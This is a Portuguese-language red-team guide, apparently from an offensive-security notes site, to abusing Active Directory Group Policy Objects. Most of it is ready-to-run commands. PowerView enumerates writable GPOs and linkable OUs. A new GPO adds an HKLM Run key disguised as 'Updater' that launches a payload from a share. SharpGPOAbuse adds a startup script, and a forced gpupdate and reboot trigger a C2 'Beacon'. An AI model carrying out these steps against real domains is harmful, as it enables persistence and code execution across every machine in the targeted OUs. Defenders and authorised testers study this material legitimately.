GPO (Group Policy Objects)
Criando GPO e Linkando com uma OU
Os objetos de política de grupo são armazenados em CN=Policies,CN=System - os principais que podem criar novos GPOs no domínio têm o privilégio Create groupPolicyContainer objects sobre este objeto. Podemos encontrá-los com o cmdlet Get-DomainObjectAcl do PowerView, procurando aqueles que têm direitos CreateChild no Group-Policy-Container e, em seguida, resolvendo seus SIDs para nomes legíveis.
powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=<subdomain>,DC=<domain>,DC=<local>" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }A partir do resultado do comando acima, podemos ver quais grupos tem direito de criar GPO. Porém, ser capaz de criar um GPO não resulta em nada, a menos que possa ser vinculado a uma OU. A capacidade de vincular um GPO a uma OU é controlada na própria OU, concedendo privilégios Write gPLink. Isso é algo que podemos encontrar com o PowerView, primeiro obtendo todas as OUs do Domínio e canalizando-as para Get-DomainObjectAcl novamente. Itere sobre cada um deles procurando instâncias de WriteProperty sobre GP-Link.
powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | flCaso o retorno seja positivo, então já sabemos que os membros de um determinado grupo, podem vincular GPOs a uma determianda OU. Aliás guarde o valor de ObjectDN para uso futuro.
Os GPOs podem ser gerenciados na linha de comando por meio dos módulos RSAT do PowerShell. Esta é uma instalação opcional e geralmente encontrada apenas em estações de trabalho de gerenciamento. O cmdlet Get-Module mostrará se eles estão presentes.
powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommandsUse o cmdlet New-GPO para criar e vincular um novo GPO.
powershell New-GPO -Name "<Mysther GPO>"Alguns abusos podem ser implementados diretamente usando o RSAT. Por exemplo, o cmdlet Set-GPPrefRegistryValue pode ser usado para adicionar uma chave de execução automática HKLM ao registro.
powershell Set-GPPrefRegistryValue -Name "<Mysther GPO>" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\<dc\dir\dns_x64.exe>" -Type ExpandStringAgora, aplique o GPO à OU de destino. Pegue o valor de ObjectDN pelo retorno do segundo comando, que em resumo será o caminho da OU vulnerável.
powershell Get-GPO -Name "<Mysther GPO>" | New-GPLink -Target "<ObjectDN>"Lembre-se que, as execuções automáticas do HKLM exigem uma reinicialização do SO para serem executadas.
Modificando GPOs Existentes
Modificar um GPO existente que já esteja aplicado a uma ou mais OUs é o cenário mais simples. Para pesquisá-los, precisamos enumerar todos os GPOs do domínio com Get-DomainGPO e verificar a ACL de cada um com Get-DomainObjectAcl. Queremos filtrar qualquer um para o qual um principal tenha privilégios de modificação, como CreateChild, WriteProperty ou GenericWrite, e também queremos filtrar os principais legítimos, incluindo SYSTEM, Domain Admins e Enterprise Admins.
powershell-import <C:\path\to\PowerView.ps1>
powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }Pegue o valor de ObjectDN e converta em seu nome de GPO. Observe a saída em displarname
powershell Get-DomainGPO -Identity "<CN={SID},CN=Policies,CN=System,DC=domain,DC=local>" | select displayName, gpcFileSysPathAgora vamos converter o SID capturado no campo SecurityIdentifier, presente na saída do primeiro comando, utilizando-o no comando abaixo. A partir do resultado, iremos saber qual grupo tem privilégios (verificar permissões no campo ActiveDirectoryRights) na GPO em questão.
powershell ConvertFrom-SID <SID-SecurityIdentifier>Também queremos saber a quais OUs essa GPO se aplica e quais computadores estão nessas OUs. As GPOs são vinculados a uma OU modificando a propriedade gPLink da própria OU. O cmdlet Get-DomainOU possui um parâmetro -GPLink que usa um GUID de GPO. No comando abaixo, utilize somente o valor SID (entre chaves) da GPO, presente no campo ObjectDN.
powershell Get-DomainOU -GPLink "<{SID-GPO}>" | select distinguishedNameFinalmente, para obter os computadores em uma OU, podemos usar Get-DomainComputer e usar o nome distinto da OU como base de pesquisa. Utilize o valor de distinguishedName do comando acima, para montar o comando abaixo.
powershell Get-DomainComputer -SearchBase "<distinguishedName>" | select dnsHostNamePara modificar um GPO sem o uso do GPMC (Group Policy Management Console), podemos modificar os arquivos associados diretamente no SYSVOL (o gpcFileSysPath).
ls \\<subdomain.domain.local>\SysVol\<subdomain.domain.local>\Policies\<{SID-GPO}>Ou se preferir, podemos fazer isso de forma automatizada. Como exemplo, podemos usar um script de inicialização no SYSVOL, que será executado toda vez que um computador afetado for iniciado.
execute-assembly <C:\path\to\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe> --AddComputerScript --ScriptName <file.bat> --ScriptContents "start /b \\<dc\dir\dns_x64.exe>" --GPOName "<gpo-vulnerable-name>"Para verificar se deu certo, execute o comando do PowerView abaixo
powershell Find-DomainShare -CheckShareAccessAgora assim que a máquina alvo tiver sua GPO atualizada e a máquina for reiniciada, irá ser trigado o Beacon. Caso tenha acesso a máquina, force esse acontecimento com os seguintes comandos
gpupdate /force
shutdown -r -t 1Sites
# SharpGPOAbuse
https://github.com/FSecureLABS/SharpGPOAbuseLast updated
Was this helpful?